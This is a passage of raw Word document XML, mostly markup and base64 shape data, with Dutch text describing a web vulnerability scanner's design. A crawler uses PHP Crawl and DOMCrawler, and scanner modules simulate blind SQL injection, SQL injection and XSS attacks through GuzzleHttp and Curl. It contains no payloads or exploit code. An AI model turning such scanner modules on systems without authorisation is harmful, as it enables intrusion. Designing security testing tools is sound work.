                    <w:p w14:paraId="1ABC8748" w14:textId="166AEC6E" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRDefault="000E3238">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1"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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1B4E2D4C" w14:textId="3A40164F" w:rsidR="000E3238" w:rsidRDefault="000E3238">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E195"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0E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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2"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IRK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o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DE40hEowIAAM0FAAAOAAAAAAAAAAAAAAAAACwCAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQA/Uozr3QAAAAsBAAAPAAAAAAAAAAAAAAAAAPsE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAABQYAAAAA&#10;" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="67DAB731" w14:textId="3B39C73A" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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3"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uCq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H4mz&#10;hGaLfHKQZ9JbftXio18zH+6YwyFEnuBiCbf4kQq6msIgUbIC9+NP+uiPs4FWSjoc6pr672vmBCXq&#10;k8GpOZ3MZpg2pMPs6P0UD27fsty3mLW+AGTSBFeY5UmM/kGNonSgH3H/LGJVNDHDsXZNwyhehLxq&#10;cH9xsVgkJ5x7y8K1ubc8po44R0o/9I/M2YH3ASfmBsbxZ9UL+mffGGlgsQ4g2zQbEemM6vACuDMS&#10;g4f9FpfS/jl5PW/h+U8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Ckrq4KowIAAM0FAAAOAAAAAAAAAAAAAAAAACwCAABk&#10;cnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQC9w9QD3QAAAAsBAAAPAAAAAAAAAAAAAAAAAPsE&#10;AABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAABQYAAAAA&#10;" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2CC51008" w14:textId="66A8FFB7" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238" w:rsidP="00C85041">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PHP Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2BC3E871" w14:textId="7351BFF8" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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4"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ak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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7F25F7B5" w14:textId="15B8F312" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PHP Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="2BC3E871" w14:textId="7351BFF8" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238" w:rsidP="00C85041">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>DOMCrawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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5"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MKa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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7C66FC20" w14:textId="4424E23A" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0E3238" w:rsidRDefault="000E3238" w:rsidP="00E416AF">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>GuzzleHttp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="570064E2" w14:textId="2016E6FC" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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6"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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5C72EFD7" w14:textId="452B1023" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00E416AF">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="570064E2" w14:textId="2016E6FC" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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7"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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="279439CE" w14:textId="5BA7443D" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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6">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0E3238" w:rsidRPr="009F6B8F" w:rsidRDefault="000E3238"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38"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CZSAp0ewIAAGYFAAAO&#10;AAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQDvXUWn3gAAAAsB&#10;AAAPAAAAAAAAAAAAAAAAANMEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA3gUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="30A09151" w14:textId="136B2D3C" w:rsidR="000E3238" w:rsidRPr="009F6B8F" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00553D99" w:rsidRDefault="000E3238"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39"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Pts&#10;gLuKAgAAkgUAAA4AAAAAAAAAAAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAh&#10;ACwTPpvaAAAABwEAAA8AAAAAAAAAAAAAAAAA4gQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAE&#10;APMAAADpBQAAAAA=&#10;" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="20C6866D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00553D99" w:rsidRDefault="000E3238"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4CD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0E3238" w:rsidRDefault="000E3238" w:rsidP="004347F1">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>PHP Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="0F70AF85" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0"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Zc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Gkp2XOkAgAAzQUAAA4AAAAAAAAAAAAAAAAALAIA&#10;AGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhABLjFXveAAAACAEAAA8AAAAAAAAAAAAAAAAA&#10;/AQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAHBgAAAAA=&#10;" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7B1FD664" w14:textId="77777777" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="004347F1">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>PHP Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="0F70AF85" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238" w:rsidP="004347F1">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>DOMCrawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRPr="00CA5627" w:rsidRDefault="000E3238"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1"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Aa8ZDqpgIAAM0FAAAOAAAAAAAAAAAAAAAA&#10;ACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQAXINKG4AAAAAoBAAAPAAAAAAAAAAAA&#10;AAAAAP4EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACwYAAAAA&#10;" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="0CB33609" w14:textId="3912D2A1" w:rsidR="000E3238" w:rsidRPr="00CA5627" w:rsidRDefault="000E3238" w:rsidP="00CA5627">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRDefault="000E3238" w:rsidP="00DE5F14">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Crawl</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="75C80A01" w14:textId="00DA019E" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238"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2"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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6B65F556" w14:textId="1634C0ED" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00DE5F14">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Crawl</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="75C80A01" w14:textId="00DA019E" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238"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7">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0E3238" w:rsidRDefault="000E3238">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3"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BYwCAACO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tyI+BYwCAACOBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEAjqn9ZN0AAAAJAQAADwAAAAAAAAAAAAAAAADkBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D5F331F" w14:textId="48B1620E" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">De </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Crawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> maakt gebruik van twee Libraries PHP Crawl en </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>DOMCrawler</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>.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0E3238" w:rsidRDefault="000E3238">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4"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jK3oCAABmBQAADgAAAGRycy9lMm9Eb2MueG1srFTdb9MwEH9H4n+w/M7SRlsp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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="262A096C" w14:textId="2B6B4B81" w:rsidR="000E3238" w:rsidRDefault="000E3238">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8">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0E3238" w:rsidRDefault="000E3238">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5"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hNH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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4B0CA0A0" w14:textId="2813259A" w:rsidR="000E3238" w:rsidRDefault="000E3238">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0E3238" w:rsidRPr="00CA5627" w:rsidRDefault="000E3238"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6"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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="15E0EE69" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00CA5627" w:rsidRDefault="000E3238" w:rsidP="00501C35">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</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0E3238" w:rsidRDefault="000E3238" w:rsidP="00501C35">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>GuzzleHttp</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="78E8D57C" w14:textId="656A3F3C" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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7"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" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3C56A4F7" w14:textId="1752FABF" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00501C35">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="78E8D57C" w14:textId="656A3F3C" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00553D99" w:rsidRDefault="000E3238"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48"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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="17966CEA" w14:textId="51B2E981" w:rsidR="000E3238" w:rsidRPr="00553D99" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00AD2D89" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r w:rsidRPr="00AD2D89">
                              <w:rPr>
                                <w:b/>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>Module</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="729F6924" w14:textId="0D4CD90E" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>BlindSQLModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="2A475321" w14:textId="38136EF1" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>SQLModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="582FAD2D" w14:textId="5C93D3FD" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                              <w:t>XSSModule</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="4BF715A6" w14:textId="147ACA34" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238"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49"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BAFr8EpwIAAM4FAAAOAAAAAAAAAAAAAAAA&#10;ACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBGxDC53wAAAAsBAAAPAAAAAAAAAAAA&#10;AAAAAP8EAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAACwYAAAAA&#10;" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7FF0DD7C" w14:textId="689177EC" w:rsidR="000E3238" w:rsidRPr="00AD2D89" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00AD2D89">
                        <w:rPr>
                          <w:b/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Module</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="729F6924" w14:textId="0D4CD90E" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>BlindSQLModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="2A475321" w14:textId="38136EF1" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>SQLModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="582FAD2D" w14:textId="5C93D3FD" w:rsidR="000E3238" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>XSSModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                    </w:p>
                    <w:p w14:paraId="4BF715A6" w14:textId="147ACA34" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238" w:rsidP="00361E77">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>HeaderModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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6B149"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0E3238" w:rsidRDefault="000E3238">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0"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CUxD1mjQIAAI8FAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQA&#10;BgAIAAAAIQDBzs023gAAAAkBAAAPAAAAAAAAAAAAAAAAAOUEAABkcnMvZG93bnJldi54bWxQSwUG&#10;AAAAAAQABADzAAAA8AUAAAAA&#10;" filled="f" strokecolor="#e7e6e6 [3214]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="1228D739" w14:textId="645F7AEB" w:rsidR="000E3238" w:rsidRDefault="000E3238">
                      <w:r>
                        <w:t xml:space="preserve">De Scanner component maakt gebruik van twee Libraries </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> en </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Curl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">. Ik heb tijdens het ontwikkelen gemerkt dat </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> niet goed kan omgaan met Post </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Requests</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> maar </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Curl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> wel, daarom handelt </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>GuzzleHttp</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> de GET Request uit en </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Curl</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> de Post Request. De component bestaat uit vijf </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>Klasses</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> waarvan de Module klasse de </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>parent</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> is van </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>BlindSQLModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>SQLModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> ne </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>XSSModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">. Dit zijn aanval georiënteerde Modules voor het simuleren van http-aanvallen. </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>HeaderModule</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t xml:space="preserve"> erft niets over van Module om dat het de abstracte functies niet nodig heeft. Hieronder staan twee functie, </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:proofErr w:type="gramStart"/>
                      <w:r>
                        <w:t>buildGETURI</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w:t>(</w:t>
                      </w:r>
                      <w:proofErr w:type="gramEnd"/>
                      <w:r>
                        <w:t xml:space="preserve">) voor het bouwen van HTTP GET Request en </w:t>
                      </w:r>
                      <w:proofErr w:type="spellStart"/>
                      <w:r>
                        <w:t>attackGet</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>
                      <w:r>
                        <w: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0E3238" w:rsidRDefault="000E3238">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1"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CRrd8PeAIAAGYFAAAOAAAA&#10;AAAAAAAAAAAAACwCAABkcnMvZTJvRG9jLnhtbFBLAQItABQABgAIAAAAIQBQiYJa3gAAAAsBAAAP&#10;AAAAAAAAAAAAAAAAANAEAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA2wUAAAAA&#10;" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6D946DE3" w14:textId="7D2A6205" w:rsidR="000E3238" w:rsidRDefault="000E3238">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9">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0E3238" w:rsidRDefault="000E3238">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2"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DEn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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="7E316BBF" w14:textId="401539DC" w:rsidR="000E3238" w:rsidRDefault="000E3238">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20">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21">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145B"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0E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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3"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R16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x+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1mUR16MCAADNBQAADgAAAAAAAAAAAAAAAAAsAgAA&#10;ZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEANOiBM94AAAAKAQAADwAAAAAAAAAAAAAAAAD7&#10;BAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAAYGAAAAAA==&#10;" fillcolor="#ffd966 [1943]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="2E717921" w14:textId="76B221DF" w:rsidR="000E3238" w:rsidRPr="00C85041" w:rsidRDefault="000E3238"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0E3238" w:rsidRPr="00553D99" w:rsidRDefault="000E3238"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4"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" fillcolor="#ffc000 [3207]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="41B87060" w14:textId="134A4212" w:rsidR="000E3238" w:rsidRPr="00553D99" w:rsidRDefault="000E3238"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5A9CE"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0E3238" w:rsidRPr="00CA5627" w:rsidRDefault="000E3238"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5"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" fillcolor="#ffe599 [1303]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="18E79A0D" w14:textId="77777777" w:rsidR="000E3238" w:rsidRPr="00CA5627" w:rsidRDefault="000E3238" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                      <w:proofErr w:type="spellStart"/>
                      <w:r w:rsidRPr="0082411B">
                        <w:rPr>
                          <w:b/>
                          <w:sz w:val="22"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <w:t>Klasses</w:t>
                      </w:r>
                      <w:proofErr w:type="spellEnd"/>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0E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238" w:rsidP="00D63E85">
                            <w:pPr>
                              <w:contextualSpacing/>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:lang w:val="en-US"/>
                              </w:rPr>
                            </w:pPr>
                          </w:p>
                          <w:p w14:paraId="10469533" w14:textId="04BEEF1C" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238"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6"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" fillcolor="#fff2cc [663]" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="11127A79" w14:textId="69428BD6" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238" w:rsidP="00D63E85">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </w:pPr>
                    </w:p>
                    <w:p w14:paraId="10469533" w14:textId="04BEEF1C" w:rsidR="000E3238" w:rsidRPr="00DE5F14" w:rsidRDefault="000E3238" w:rsidP="00006A7A">
                      <w:pPr>
                        <w:contextualSpacing/>
                        <w:jc w:val="center"/>
                        <w:rPr>
